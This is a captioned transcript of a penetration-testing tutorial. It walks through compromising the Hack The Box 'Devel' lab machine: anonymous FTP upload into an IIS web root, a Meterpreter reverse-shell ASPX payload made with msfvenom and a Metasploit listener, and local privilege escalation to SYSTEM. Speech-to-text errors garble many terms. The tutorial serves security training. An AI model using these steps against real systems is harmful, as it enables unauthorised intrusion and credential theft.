1 00:00:00,390 --> 00:00:07,610 All right guys and girls we are going to be working on a machine today called Devil diva. 2 00:00:07,670 --> 00:00:10,230 No not I'll. 3 00:00:10,450 --> 00:00:13,480 Now this is a nice machine to take a step up. 4 00:00:13,480 --> 00:00:19,570 We've been mostly learning about SMB exploitation today we're gonna be learning a little bit more about 5 00:00:21,210 --> 00:00:28,180 Shell co-generation and how we can do a little bit of enumeration and let's just let's not talk about 6 00:00:28,180 --> 00:00:28,570 it yet. 7 00:00:28,600 --> 00:00:31,260 Let's do our first thing first kind of deal. 8 00:00:31,260 --> 00:00:33,490 Let's go ahead and spin up that machine right. 9 00:00:34,240 --> 00:00:42,670 And let's go ahead and star and map skin some missed out a new window here and we're going to do and 10 00:00:42,670 --> 00:00:49,950 map T4 dash A B and again for the second video in a row. 11 00:00:49,960 --> 00:00:57,470 I've already forgotten what the IP addresses is dot five we're going to scan dot five and we will let 12 00:00:57,470 --> 00:00:59,210 that scan. 13 00:00:59,210 --> 00:01:04,350 So in my common stalling tactic let's talk about the machine a little bit more in detail what we're 14 00:01:04,350 --> 00:01:11,420 going to be seeing today is a machine that is very common at least at the beginner levels of hack the 15 00:01:11,420 --> 00:01:12,070 box. 16 00:01:12,140 --> 00:01:15,430 Now the exploitation type isn't really as common. 17 00:01:15,440 --> 00:01:22,460 But what what you're going to see is you're going to see a very common port combination something along 18 00:01:22,460 --> 00:01:31,190 the lines of port 21 and port 80 you see that a lot where you have a Web site and you have port 21 or 19 00:01:31,190 --> 00:01:38,780 you might have port 22 in port 80 and you have to leverage and exploit somewhere in order to get somewhere 20 00:01:38,780 --> 00:01:41,030 else and you're going to see that here in a minute. 21 00:01:41,030 --> 00:01:47,630 Now if you remember back to Episode Two We talked about FCP remember we had FTB in our machine it was 22 00:01:47,960 --> 00:01:48,910 was lame right. 23 00:01:48,920 --> 00:01:58,250 We did lame and we had T.P. and I talked about the staging process about having to need a place to execute 24 00:01:58,310 --> 00:02:02,530 an exploit and you're going to see that come into play today. 25 00:02:02,530 --> 00:02:09,850 How can we leverage FTB if we have anonymous access and how how can we enumerate what is in front of 26 00:02:09,850 --> 00:02:14,260 us so we're gonna go ahead and just let this scan finish really quick. 27 00:02:14,260 --> 00:02:19,360 And then once the scan finishes we're going to be be looking at it and we'll talk further into detail 28 00:02:21,090 --> 00:02:21,480 OK. 29 00:02:21,490 --> 00:02:23,320 The scan has returned. 30 00:02:23,610 --> 00:02:33,440 So let's take a look here and as I kind of discussed we have port 21 and we have port 80 here. 31 00:02:33,570 --> 00:02:37,500 Now there is a little bit of information that is being disclosed to us. 32 00:02:37,710 --> 00:02:42,870 Here you can see that we have Microsoft I guess seven point five. 33 00:02:42,930 --> 00:02:44,220 Why do we know that. 34 00:02:44,550 --> 00:02:51,960 Well because they're putting it in their headers now on a vulnerability assessment or a pen test. 35 00:02:51,960 --> 00:02:53,550 This is a no no. 36 00:02:53,550 --> 00:02:56,040 This is a information disclosure. 37 00:02:56,040 --> 00:02:58,200 It's a low finding it's very low. 38 00:02:58,320 --> 00:03:01,330 But all this is here is information disclosure right. 39 00:03:01,330 --> 00:03:03,540 It's information gathering for us. 40 00:03:03,660 --> 00:03:06,750 We want to avoid this if we can. 41 00:03:06,750 --> 00:03:12,210 Same thing with the site title I guess now that's beginning to tell me just from experience that we're 42 00:03:12,210 --> 00:03:19,560 probably looking at a default web page if the title is going to be I a seven on the other front. 43 00:03:19,560 --> 00:03:28,120 Here we see that there is FTC open with anonymous log in and we can see there are some files in here 44 00:03:28,150 --> 00:03:37,450 that to me the experienced I look as if they are an i s a directory right a web root directory. 45 00:03:37,450 --> 00:03:42,910 So what we're looking at is anonymous log in which again is probably a no no. 46 00:03:42,910 --> 00:03:43,180 Right. 47 00:03:43,180 --> 00:03:49,780 Why why are we allowing people to log in anonymously unless there's a very very good reason for this. 48 00:03:49,840 --> 00:03:53,360 This is probably a ding on an assessment as well. 49 00:03:53,500 --> 00:03:57,670 If we scroll down through the rest it's going to take some guesses at the operating system. 50 00:03:57,670 --> 00:03:59,470 It's not a phone. 51 00:03:59,470 --> 00:04:03,240 So again this isn't really come through that great. 52 00:04:03,500 --> 00:04:04,420 I got some trace route. 53 00:04:04,420 --> 00:04:05,680 Nothing nothing fancy. 54 00:04:05,710 --> 00:04:07,030 So we're going to focus here. 55 00:04:07,540 --> 00:04:15,990 So what it looks like here is we have a Web site and we've got FTB so my enumeration for a Web site. 56 00:04:16,130 --> 00:04:17,200 First things first. 57 00:04:17,210 --> 00:04:23,400 The first thing I like to go do is I like to go out to the Web site and we'll just go to 10 that tend 58 00:04:23,430 --> 00:04:29,550 to 10 up five and you see that it is in fact a default web page for you to click on this. 59 00:04:29,570 --> 00:04:33,660 It would go to to Microsoft's Web site. 60 00:04:33,780 --> 00:04:37,310 Now you see this a lot during pen testing. 61 00:04:37,340 --> 00:04:37,790 OK. 62 00:04:38,270 --> 00:04:42,030 When we're doing pen testing we come across these default web pages a lot. 63 00:04:42,080 --> 00:04:44,580 Now this signifies one of two things. 64 00:04:44,750 --> 00:04:54,890 One they have a Web site out in the open and they have it running on the back end somewhere at a different 65 00:04:54,890 --> 00:04:55,730 directory right. 66 00:04:55,730 --> 00:05:01,100 There's probably a directory to this to a web page they're running and it may resolve to a domain name. 67 00:05:01,100 --> 00:05:08,150 Let's just say Google it may be like Dad Dad Google dot com is where they're running on this web server. 68 00:05:08,450 --> 00:05:14,660 But when you just navigate to port 80 or par 4 4 3 the default web page is still here. 69 00:05:14,660 --> 00:05:17,360 This is a finding on a pen test as well. 70 00:05:17,360 --> 00:05:21,720 This signifies that there is poor hygiene. 71 00:05:21,720 --> 00:05:22,010 Right. 72 00:05:22,010 --> 00:05:23,440 If we're seeing this in the other. 73 00:05:23,450 --> 00:05:28,370 The other thing I should mention too is the other part of this is OK potentially when I'm a running 74 00:05:28,370 --> 00:05:33,710 Web site they are just they just have eyes on for whatever reason. 75 00:05:33,740 --> 00:05:35,270 Again same thing. 76 00:05:35,270 --> 00:05:37,610 Poor hygiene as an attacker. 77 00:05:37,610 --> 00:05:43,710 If I'm seeing default web pages that makes me think OK what other things have you forgot to turn off. 78 00:05:43,760 --> 00:05:49,110 Are you a lazy person a lazy engineer on the other side that I'm up against. 79 00:05:49,190 --> 00:05:51,620 Why am I seeing these kinds of things. 80 00:05:51,740 --> 00:05:55,030 So because of this it makes me really inquisitive. 81 00:05:55,040 --> 00:05:56,430 Right. 82 00:05:56,540 --> 00:06:02,070 And when I see default web pages I think OK there's probably a reason that it's up there. 83 00:06:02,090 --> 00:06:05,730 If there is then there's probably a hidden directory somewhere. 84 00:06:05,750 --> 00:06:13,640 So my first thought is in this instance is I'm going to look for extra directories and my favorite tool 85 00:06:13,640 --> 00:06:16,110 for that is called Door buster. 86 00:06:16,130 --> 00:06:24,440 Now let's go ahead and open up a new tab now door buster stands or is short for directory busting. 87 00:06:24,440 --> 00:06:28,600 And what we're doing is we're going to brute force directories here. 88 00:06:28,610 --> 00:06:32,200 So we'll say directory one directory to directory three right. 89 00:06:32,210 --> 00:06:36,740 We'll just try to go through a whole list of directories that we provide and see if any of them come 90 00:06:36,740 --> 00:06:37,960 back. 91 00:06:37,970 --> 00:06:42,740 Now we may be able to find some hidden information especially and capture the flag type stuff and in 92 00:06:42,740 --> 00:06:45,670 real world situations where you run into this. 93 00:06:45,710 --> 00:06:48,750 So let's go ahead and type in Dir buster. 94 00:06:48,920 --> 00:06:53,000 Now I'd like to do a door buster and like this start its own process. 95 00:06:53,480 --> 00:06:53,810 OK. 96 00:06:53,810 --> 00:06:57,200 Another thing that I should know is there are other tools that we can use. 97 00:06:57,200 --> 00:06:58,840 Door buster is my favorite. 98 00:06:58,940 --> 00:07:02,630 A lot of people are big on go Buster right now. 99 00:07:02,630 --> 00:07:03,940 I haven't jumped on that train. 100 00:07:03,950 --> 00:07:06,870 I've used it sometimes and it works very well. 101 00:07:06,890 --> 00:07:15,200 The other one that people like is called Durbin D I R B you can use either those as well and be successful 102 00:07:15,200 --> 00:07:16,030 here. 103 00:07:16,070 --> 00:07:24,380 So what I'm going to do is I'm just going to copy the web address and should paste in here and actually 104 00:07:24,380 --> 00:07:24,830 didn't. 105 00:07:24,830 --> 00:07:25,090 OK. 106 00:07:25,100 --> 00:07:28,320 So we'll have to type in a GDP double dad slash slash. 107 00:07:28,580 --> 00:07:31,000 And it likes the port 80 at the end like that. 108 00:07:31,130 --> 00:07:31,490 OK. 109 00:07:32,690 --> 00:07:40,440 On top of this I like to use more threads because we get to go faster when we do that so on top of that 110 00:07:40,680 --> 00:07:41,960 we need a word list. 111 00:07:41,960 --> 00:07:47,970 Here is our word this area now Kelly is very nice if you go to the base here. 112 00:07:48,000 --> 00:07:56,890 There is a user folder share and then if you start typing word lists like what you find there is a worry 113 00:07:56,900 --> 00:07:57,550 list folder. 114 00:07:57,580 --> 00:08:02,100 So again user share worry lists inside of that is Dir. 115 00:08:02,100 --> 00:08:04,810 Buster here. 116 00:08:05,060 --> 00:08:06,430 And then there's word list. 117 00:08:06,440 --> 00:08:12,140 Now the one I like to use is the medium but for this instance where it is going to use small and in 118 00:08:12,140 --> 00:08:17,390 some cases if you're really got a lot of time there is a big word lists out on GitHub if you search 119 00:08:17,390 --> 00:08:24,060 for door buster big worry lists somebody has made one says go ahead and select this wordless. 120 00:08:24,180 --> 00:08:27,960 Now if we come down to the bottom down here what were we looking at. 121 00:08:27,960 --> 00:08:31,410 We're gonna brute first directories files we're gonna be recursive. 122 00:08:31,410 --> 00:08:35,100 That means if we find something we're going to we find one directory we're going to go ahead and go 123 00:08:35,100 --> 00:08:38,280 on and try to find more directories inside that directory. 124 00:08:38,280 --> 00:08:40,560 So this is great. 125 00:08:40,590 --> 00:08:45,490 The one thing that we're gonna do here is though BHP is not or searching for. 126 00:08:45,900 --> 00:08:52,980 Now this this is a Windows machine right in highly probability that we're running against a Windows 127 00:08:52,980 --> 00:09:01,800 machine because we're running against Microsoft by us and we're gonna be running against ESM ESM exe 128 00:09:01,800 --> 00:09:08,920 file extensions ASPCA aspects file extensions probably higher more probability right than we are going 129 00:09:08,920 --> 00:09:10,090 to be p p. 130 00:09:10,740 --> 00:09:16,140 If this were an Apache web server for example then we would be using a p p extension but in this instance 131 00:09:16,260 --> 00:09:18,770 I'm going to hedge my bet that it's not. 132 00:09:19,050 --> 00:09:27,470 So we're going to go ahead and say something along the lines of ESM comma ESM X comma RSP comma A.S.A.P. 133 00:09:27,470 --> 00:09:28,090 x. 134 00:09:28,140 --> 00:09:33,030 Now they'll search for all four extensions on top of this. 135 00:09:33,090 --> 00:09:37,830 I always like to add in some other stuff when I'm doing this in the real world assessment like a text 136 00:09:37,830 --> 00:09:47,700 file like a zip file backup file rar file a secret database etc. You can make this list longer the longer 137 00:09:47,700 --> 00:09:52,850 you make this list the longer it's going to take especially if it starts finding directories. 138 00:09:52,860 --> 00:09:55,720 Now let's go ahead and hit start on this guy. 139 00:09:56,620 --> 00:09:59,770 Now I'll be honest I have actually not run directory busting on this. 140 00:09:59,780 --> 00:10:05,270 I am just showing you my methodology when I see a web page and especially when I see something like 141 00:10:05,270 --> 00:10:06,150 this. 142 00:10:06,350 --> 00:10:18,930 Now my eye my trained eye would actually go right here to f T.P. OK so GP I am seeing a s p underscore 143 00:10:18,930 --> 00:10:27,350 a client I'm seeing I start Di H Tam and I'm seeing welcome dot P G we do a view page source we come 144 00:10:27,350 --> 00:10:32,420 into here and we see what welcomed at PSG right. 145 00:10:32,470 --> 00:10:39,310 So we could probably replace this file with a picture of something else if we wanted to we could just 146 00:10:39,310 --> 00:10:44,490 go out to the web and we can go to Google and let's just say something like cute dog. 147 00:10:44,500 --> 00:10:45,280 Right. 148 00:10:45,610 --> 00:10:51,500 We'll take the cute dog let's go find an image of one and let's say I want to. 149 00:10:51,500 --> 00:10:55,200 I want a j peg so. 150 00:10:55,240 --> 00:10:55,500 OK. 151 00:10:55,510 --> 00:11:03,800 This one's a j peg I'm just gonna go ahead and say that image out to my desktop and we'll just call 152 00:11:03,800 --> 00:11:07,660 it we'll call it dog J. 153 00:11:08,120 --> 00:11:14,960 Whoops a dog that JP. 154 00:11:15,290 --> 00:11:16,030 All right. 155 00:11:16,550 --> 00:11:22,210 And this is just a proof of concept here that we are in indeed in a web folder. 156 00:11:22,310 --> 00:11:26,010 So let's go ahead and do this. 157 00:11:26,390 --> 00:11:27,020 Blow it up. 158 00:11:27,140 --> 00:11:35,930 Ominous change to my desktop since that's where I put the file and then let's FTB over to this web or 159 00:11:35,930 --> 00:11:37,670 this this machine. 160 00:11:37,670 --> 00:11:40,670 I should say now it's going to ask for a name. 161 00:11:40,700 --> 00:11:45,870 And we saw that anonymous log in work so we're just going to do anonymous anonymous. 162 00:11:46,110 --> 00:11:46,680 OK. 163 00:11:47,070 --> 00:11:49,340 And then we have commands it gets a help. 164 00:11:50,160 --> 00:11:55,680 And you got a lot of commands very similar to Linux you could say less VW D. 165 00:11:56,220 --> 00:12:00,930 OK you could see what directories you have access do now we could enumerate this. 166 00:12:00,930 --> 00:12:07,070 We could go into this A.S.A.P. net underscore client and see if there's any files in here. 167 00:12:07,080 --> 00:12:13,140 Dig deeper get information out of it just to save time purposes I'm not going to do that but just know 168 00:12:13,140 --> 00:12:16,800 that that's perfectly OK in terms of enumeration. 169 00:12:16,800 --> 00:12:22,860 So here let's go ahead and just do a put this just means we're gonna put something onto the server. 170 00:12:22,860 --> 00:12:29,440 I'm going to put dog that JP onto the server Ellis looks like it's there. 171 00:12:29,450 --> 00:12:30,050 Nice. 172 00:12:30,680 --> 00:12:31,000 OK. 173 00:12:31,030 --> 00:12:35,260 So now we come here and we say forward slash dog died J.P. 174 00:12:38,240 --> 00:12:43,550 I don't know what happened to my wonderful picture but my wonderful picture is somewhat there. 175 00:12:43,940 --> 00:12:46,100 So we know that it worked. 176 00:12:46,100 --> 00:12:46,370 Right. 177 00:12:46,370 --> 00:12:49,510 We could put a text file there whatever OK. 178 00:12:49,520 --> 00:12:57,810 Why is this important Well this is important because we talked about this two episodes ago I can put 179 00:12:57,810 --> 00:13:05,820 things into this folder but unless I have a second chain of where I can have somebody execute them or 180 00:13:05,970 --> 00:13:12,040 I can execute them myself then FTB really isn't that vulnerable to me. 181 00:13:12,270 --> 00:13:14,460 But what do we just do. 182 00:13:14,460 --> 00:13:17,530 Well we just came in here and we executed this file. 183 00:13:17,550 --> 00:13:17,790 Right. 184 00:13:17,790 --> 00:13:22,500 We access this file the server read this file and we've executed it. 185 00:13:23,040 --> 00:13:29,570 So what's stopping us then from putting malware onto this and doing the same thing. 186 00:13:29,640 --> 00:13:30,920 And that's really what I'm after. 187 00:13:30,930 --> 00:13:34,230 I want to put some malware under this machine and I want to exploit it. 188 00:13:34,230 --> 00:13:34,680 Right. 189 00:13:35,040 --> 00:13:37,410 So we're going to do that right now. 190 00:13:38,250 --> 00:13:45,480 So what we can do is we can use a tool called MSF venom in the last episode. 191 00:13:45,480 --> 00:13:49,630 We very very briefly talked about MSF venom. 192 00:13:49,680 --> 00:13:54,750 And one thing that you can do is if you ever need a cheat sheet you can just go up to Google and you 193 00:13:54,750 --> 00:14:01,610 could say MSF venom and know this is like you could see chichi right here. 194 00:14:01,650 --> 00:14:08,790 You can do something like RSP X and just find something particular like this is one that I've been to 195 00:14:08,790 --> 00:14:10,530 in the past. 196 00:14:10,530 --> 00:14:15,200 You could look at these cheat sheets here there's a high on coffee cheat sheet as well. 197 00:14:15,270 --> 00:14:20,130 There's a bunch in here they'll tell you like Hey if you're doing it against a Windows machine or hey 198 00:14:20,160 --> 00:14:24,020 here's a recipe right here and this is really what we're after right. 199 00:14:24,030 --> 00:14:28,570 Because we know that they run A.S.A.P. HSV X as an I.S. server. 200 00:14:28,800 --> 00:14:31,110 So this is the type of file we're going to need. 201 00:14:31,110 --> 00:14:32,590 Now this or an Apache server. 202 00:14:32,610 --> 00:14:35,760 OK maybe we need an Apache payload right. 203 00:14:35,940 --> 00:14:41,680 Or if it's GSP or for using Tomcat then we're gonna do a war file and we have a bunch of different cheep 204 00:14:41,680 --> 00:14:42,720 cheep payloads here. 205 00:14:42,720 --> 00:14:43,760 This is perfect. 206 00:14:44,670 --> 00:14:51,660 So what we're gonna do is we're going to generate a payload so all we're doing is generating malware. 207 00:14:51,720 --> 00:14:58,290 We are generating something that is going to say hey I'm listening on this connection use this payload 208 00:14:58,290 --> 00:15:01,780 here right and this payload is going to be a return greater payload. 209 00:15:01,950 --> 00:15:06,780 Remember that I told you in the last episode that if I have the opportunity I will use them interpreter 210 00:15:06,780 --> 00:15:07,640 payload. 211 00:15:07,680 --> 00:15:12,830 We also could just use a generic windows exploit payload here. 212 00:15:12,990 --> 00:15:18,600 But what we're gonna do is we're going to use this type of payload and we're going to exploit it. 213 00:15:19,040 --> 00:15:19,280 OK. 214 00:15:19,320 --> 00:15:24,060 So this payload is going to say hey use this payload contact back to me. 215 00:15:24,060 --> 00:15:30,320 Reverse shall right contact back to me at my listening host at my listening port. 216 00:15:30,840 --> 00:15:32,960 And then let's set a file type in a shell. 217 00:15:32,980 --> 00:15:36,570 So let's go ahead and type this out and then we'll talk about it in more detail. 218 00:15:36,570 --> 00:15:41,650 So we're gonna do MSF venom and we're gonna do a dash P for payload. 219 00:15:42,470 --> 00:15:44,500 And this payload should look familiar to you. 220 00:15:44,500 --> 00:15:44,780 Right. 221 00:15:44,780 --> 00:15:45,650 Windows. 222 00:15:45,690 --> 00:15:47,640 My interpreter. 223 00:15:48,320 --> 00:15:52,940 And then we're gonna say reverse DCP OK. 224 00:15:52,940 --> 00:15:59,960 Now we don't know if this house is going to be a 32 bit or 64 bit. 225 00:15:59,990 --> 00:16:06,560 So let's start with a 32 bit if we need to improve the payload we can all right so let's do this. 226 00:16:06,560 --> 00:16:14,330 We'll say l hosted and then we need our IP address minus ten not ten not fourteen not twenty four we 227 00:16:14,330 --> 00:16:22,430 need a listening for we're just gonna use all fours for now and then we are going to say a file type 228 00:16:22,580 --> 00:16:29,870 so I'm going to say RSP X you could also do a ISP that'll be fine but aspects and then we're gonna do 229 00:16:29,900 --> 00:16:35,420 is we're gonna put this all into a file OK we get this call this e x the ISP x. 230 00:16:35,630 --> 00:16:43,400 Now if we didn't add this into a file here then this would print out Shell code for us and we're not 231 00:16:43,460 --> 00:16:48,200 we're not at that level right now or printing out copying and putting into the things we need this to 232 00:16:48,200 --> 00:16:54,290 be into its own ISP X Files so when we execute it it runs the command that it needs to and it knows 233 00:16:54,290 --> 00:16:59,780 that based on the file type in the server we're putting it on is appropriate for this ISP x file type. 234 00:17:00,500 --> 00:17:00,740 Okay. 235 00:17:00,770 --> 00:17:06,140 So we're gonna hit Enter now it's gonna take a second to generate it's gonna put it on the desktop is 236 00:17:06,140 --> 00:17:13,970 where we had it and then once it generates we need to do one other thing we need to now open up one 237 00:17:13,970 --> 00:17:22,640 more new tab and then I'm going to go into Metis boy MSF console follow along with this and we're gonna 238 00:17:22,670 --> 00:17:29,390 run that exploit handler now you saw all this in the last episode you just saw it done for us now we're 239 00:17:29,390 --> 00:17:31,040 gonna do this ourselves. 240 00:17:31,040 --> 00:17:38,600 OK so let's say use exploit mole Ty handler. 241 00:17:38,790 --> 00:17:44,760 Now we really haven't gotten into net cat yet but when we do this is very similar to net cat we are 242 00:17:44,760 --> 00:17:45,920 just listening right. 243 00:17:45,930 --> 00:17:48,780 All we're doing is saying open up a listener. 244 00:17:48,960 --> 00:17:54,570 And on this port talk back to me at this IP address and we're just me listening on that port. 245 00:17:54,880 --> 00:18:00,140 So let's go ahead and just say options you're going to see that there's literally nothing in here. 246 00:18:00,420 --> 00:18:05,610 So we're going to have to do is we're going to have to set a payload so the payload has to be identical 247 00:18:05,610 --> 00:18:07,440 to what we just generated. 248 00:18:07,530 --> 00:18:08,650 So that's going to be. 249 00:18:08,670 --> 00:18:17,130 Payload of Windows and you should be able to auto tab is just a little slow interpreter and then we've 250 00:18:17,130 --> 00:18:27,540 got reverse underscore DCP options again OK now let's set the L host to your IP address. 251 00:18:27,540 --> 00:18:29,520 You're listening host. 252 00:18:29,520 --> 00:18:32,970 The port has to match as well all for us as the default. 253 00:18:32,970 --> 00:18:34,970 That's perfect that's what we chose. 254 00:18:34,980 --> 00:18:37,090 Let's go ahead and run this. 255 00:18:37,140 --> 00:18:39,990 Now we're just gonna let this sit here and it's going to run in listen. 256 00:18:40,020 --> 00:18:40,550 OK. 257 00:18:41,960 --> 00:18:45,170 So coming back to here I bet we've lost our connection. 258 00:18:45,170 --> 00:18:46,680 Let's see if we have we have. 259 00:18:46,730 --> 00:18:47,010 OK. 260 00:18:47,030 --> 00:18:54,180 Let's say bye and connect again anonymous anonymous. 261 00:18:54,500 --> 00:19:00,340 Now let's go ahead and put that E X dot aspects file on here. 262 00:19:00,430 --> 00:19:01,060 We did it. 263 00:19:01,060 --> 00:19:01,810 Perfect. 264 00:19:01,810 --> 00:19:08,660 Another thing that I should note too is we are likely transferring the ASCII right now ASIC II. 265 00:19:09,130 --> 00:19:15,760 Preferably we should transfer via binary so you type binary and then transfer your file. 266 00:19:15,760 --> 00:19:21,510 I think it's OK if you ever run into issues with FTB and you're transferring a file or a payload and 267 00:19:21,500 --> 00:19:22,570 it's not working. 268 00:19:22,570 --> 00:19:26,980 Try switching to binary and then transferring the file again and seeing if that fixes anything. 269 00:19:26,980 --> 00:19:28,360 I've had that happen in the past. 270 00:19:28,360 --> 00:19:34,850 It's better to use binary over ASCII OK so we know how to call out right. 271 00:19:34,850 --> 00:19:41,390 We've got a listener going we've got our malware uploaded and so we're waiting here for a connection. 272 00:19:41,390 --> 00:19:46,300 Now we need to engage that malware and make the server execute it. 273 00:19:46,340 --> 00:19:50,540 So ISP X X that ISP X here hit enter. 274 00:19:50,970 --> 00:19:52,330 OK it engaged. 275 00:19:52,580 --> 00:19:55,340 And look we just got a session that easy. 276 00:19:56,180 --> 00:19:56,650 OK. 277 00:19:56,660 --> 00:20:02,500 So we say sis info x eighty six. 278 00:20:02,500 --> 00:20:07,620 INTERPRETER We won the lottery there we got the right write system on everything OK. 279 00:20:07,630 --> 00:20:12,120 X eighty six interpreter architecture x eighty six windows 7 Bill. 280 00:20:12,130 --> 00:20:16,170 And then we say get you I.T. crap. 281 00:20:16,180 --> 00:20:18,670 We are not authority system. 282 00:20:18,730 --> 00:20:19,430 Darn it. 283 00:20:19,960 --> 00:20:22,390 So we can't do things like cash down right now. 284 00:20:22,390 --> 00:20:22,960 Right. 285 00:20:22,960 --> 00:20:25,740 We're not we're not system. 286 00:20:25,990 --> 00:20:31,780 Now there is a tool that we can try to use called Get system hit Enter didn't work. 287 00:20:31,780 --> 00:20:33,160 That's OK. 288 00:20:33,160 --> 00:20:38,590 Sometimes you get wind from this but do note that in a rare occasion that actually can crash a machine 289 00:20:38,590 --> 00:20:39,700 if you're doing it on a pen test. 290 00:20:39,700 --> 00:20:44,980 So be very careful but one of the favorite things that I want to show you and I talked about it last 291 00:20:44,980 --> 00:20:48,980 time is there are post modules in return fritter. 292 00:20:49,030 --> 00:20:56,130 So what we can do with our session is we can actually background the session and then we can say let's 293 00:20:56,130 --> 00:20:56,990 search for this. 294 00:20:57,000 --> 00:21:01,850 We'll say search suggested like this. 295 00:21:01,850 --> 00:21:03,300 And there's only one. 296 00:21:03,300 --> 00:21:06,600 But look this is a post module here. 297 00:21:06,640 --> 00:21:15,920 So let's copy this and we're going to say use paste this hit enter and then let's look at our options 298 00:21:15,920 --> 00:21:18,220 now and look what it's going to ask for. 299 00:21:18,320 --> 00:21:22,260 It's gonna say Hey all I need is this section because you already have a session. 300 00:21:22,310 --> 00:21:27,590 So just give me that and I'll I'll access that session and we'll we'll do a little bit of enumeration. 301 00:21:27,590 --> 00:21:30,470 So this is post exploitation enumeration. 302 00:21:30,470 --> 00:21:30,880 OK. 303 00:21:31,400 --> 00:21:33,680 So we're gonna say set session to 1. 304 00:21:33,810 --> 00:21:35,000 Now we're going to run this. 305 00:21:35,000 --> 00:21:39,980 And what this is going to do is this is going to look through all the x eighty 86 exploits that it knows 306 00:21:39,980 --> 00:21:46,400 of that our privilege escalation exploits it's going to compare what's going on in the Windows system 307 00:21:46,460 --> 00:21:47,780 and say hey yeah. 308 00:21:47,810 --> 00:21:50,940 That might be good for this or no that's not going to work. 309 00:21:51,050 --> 00:21:57,150 And then it's going to return a list of those that will possibly work for us. 310 00:21:57,200 --> 00:21:57,560 OK. 311 00:21:57,560 --> 00:21:59,010 And this will only take a minute. 312 00:21:59,180 --> 00:22:04,550 And then what happens is we're gonna go through this list and we're going to say OK I'm going to try 313 00:22:04,550 --> 00:22:09,960 the first one or the second one or the third one and we're just gonna keep going until we know you know 314 00:22:09,980 --> 00:22:11,960 if it's vulnerable look I mean you're coming through. 315 00:22:12,110 --> 00:22:17,880 So best scenario for us here is we've got one two three four five. 316 00:22:17,890 --> 00:22:21,260 We could go through this whole list if we're desperate. 317 00:22:21,560 --> 00:22:24,470 The one that I like to use we could use this bypass event viewer. 318 00:22:24,500 --> 00:22:27,640 Let's just go straight for the win here I believe. 319 00:22:27,650 --> 00:22:29,170 Get your pods going to work. 320 00:22:29,270 --> 00:22:34,410 Get your pods pretty friendly so let's go ahead and say use paste. 321 00:22:34,670 --> 00:22:36,590 Now I'm going to show you something. 322 00:22:36,590 --> 00:22:39,530 Let's type in options. 323 00:22:39,580 --> 00:22:43,030 Let's set the session to 1 and look. 324 00:22:43,030 --> 00:22:47,260 It already has our target as Windows 7 that's fine X 86. 325 00:22:47,260 --> 00:22:47,890 Perfect. 326 00:22:47,890 --> 00:22:48,610 So our sessions. 327 00:22:48,610 --> 00:22:49,510 Good. 328 00:22:49,510 --> 00:22:53,000 And let's type in options again okay. 329 00:22:53,010 --> 00:22:58,690 Look at the screen remember the screen see what happens now let's hit run. 330 00:22:58,720 --> 00:23:02,180 This is not going to work OK. 331 00:23:02,200 --> 00:23:06,440 We launched we launched a process we did not get a reverse shell back. 332 00:23:06,820 --> 00:23:11,020 Let's type in options again look what changed. 333 00:23:11,260 --> 00:23:13,430 Now payload options are in here. 334 00:23:13,540 --> 00:23:14,520 Why didn't this work. 335 00:23:14,890 --> 00:23:19,590 Well for me it always tends to default back to my Ethernet interface. 336 00:23:19,660 --> 00:23:21,340 I don't know why it does this. 337 00:23:21,340 --> 00:23:26,890 So you could without seeing the screen if you keep it in the back of your mind you could just say Hey 338 00:23:27,400 --> 00:23:32,190 I know that I need my ell host to be 10 not 10 14 got 24. 339 00:23:32,590 --> 00:23:33,410 And you know what. 340 00:23:33,430 --> 00:23:38,740 I know I'm already on a el port of all fours so I'm already listening or I've already used that port 341 00:23:38,740 --> 00:23:39,190 up. 342 00:23:39,220 --> 00:23:40,940 Let's do something different. 343 00:23:41,080 --> 00:23:44,220 Let's set the airport to four four four or five. 344 00:23:44,230 --> 00:23:45,450 It's fine right. 345 00:23:45,550 --> 00:23:46,870 Let's look at our options now. 346 00:23:47,760 --> 00:23:48,240 OK. 347 00:23:48,250 --> 00:23:56,610 And now let's try running this and let's see if we if we can get this to work. 348 00:23:57,280 --> 00:24:05,620 So it might take a second from the first exploitation it might might take a second here OK. 349 00:24:05,630 --> 00:24:06,510 And what has happened. 350 00:24:06,520 --> 00:24:08,150 I've lost my session. 351 00:24:08,960 --> 00:24:15,200 So let's go ahead and I'm going to control see here what we need to do is we need to setup another listener 352 00:24:15,740 --> 00:24:21,470 and we could probably just tab up a little bit. 353 00:24:21,530 --> 00:24:22,730 There you go. 354 00:24:22,730 --> 00:24:25,750 And then say options here OK. 355 00:24:25,760 --> 00:24:27,060 So I'm going to run this again. 356 00:24:27,080 --> 00:24:29,060 We just need to execute that payload. 357 00:24:29,060 --> 00:24:31,090 Sometimes your listener dies. 358 00:24:31,340 --> 00:24:34,670 Hopefully you're a little bit more fortunate than me and yours didn't. 359 00:24:34,730 --> 00:24:37,800 You can see now that we've generated again we've got the shell. 360 00:24:37,820 --> 00:24:38,940 We'll be quick about this. 361 00:24:38,930 --> 00:24:41,950 We'll go background you tag up a few times. 362 00:24:41,960 --> 00:24:49,550 We've got the kitchen pod in there are ready set the session to two instead of one because our new session 363 00:24:49,550 --> 00:24:56,430 is session to and then we'll say options and now let's go ahead and run it. 364 00:24:56,560 --> 00:25:00,570 And it's possible that we killed our session with the failed attempt there. 365 00:25:00,610 --> 00:25:06,160 What I actually believe happens is that it goes it tries to connect and then you potentially lose your 366 00:25:06,160 --> 00:25:09,790 session because it closes out the other one to exploit it to be the new one. 367 00:25:10,270 --> 00:25:13,460 So let's try this one here OK. 368 00:25:13,470 --> 00:25:16,230 And now we ran the session and we're OK. 369 00:25:16,380 --> 00:25:22,290 So if you lost your session like me showing you proof of concept no in the back of your mind that hey 370 00:25:22,290 --> 00:25:28,570 I probably want to set an el port on these private ask or an El host as well in these previous attempts. 371 00:25:28,920 --> 00:25:34,800 And then let's go ahead and say get you Aidid and you can now see that where authorities system. 372 00:25:34,800 --> 00:25:40,950 So same thing as before we can do a hash dome look at the hash is we can go grab the. 373 00:25:41,730 --> 00:25:47,930 The route the user whatever the flags on those not going to show you to do that we can load modules 374 00:25:48,330 --> 00:25:50,040 you've seen that over and over right. 375 00:25:50,040 --> 00:25:53,010 This is kind of coming becoming repetition. 376 00:25:53,010 --> 00:25:55,650 So this is a great way of doing this. 377 00:25:55,680 --> 00:26:03,430 My challenge to you is look into payloads OK I don't know what the command is I believe it's MSA venom 378 00:26:03,430 --> 00:26:10,990 dash l might not be Al there is a payload option in here that lists out all the payloads 379 00:26:14,320 --> 00:26:21,660 OK let's do a dash El payloads then and it lists all the payloads. 380 00:26:21,660 --> 00:26:30,800 My suggestion is to go back into this machine and instead of running return fritter try running a Windows 381 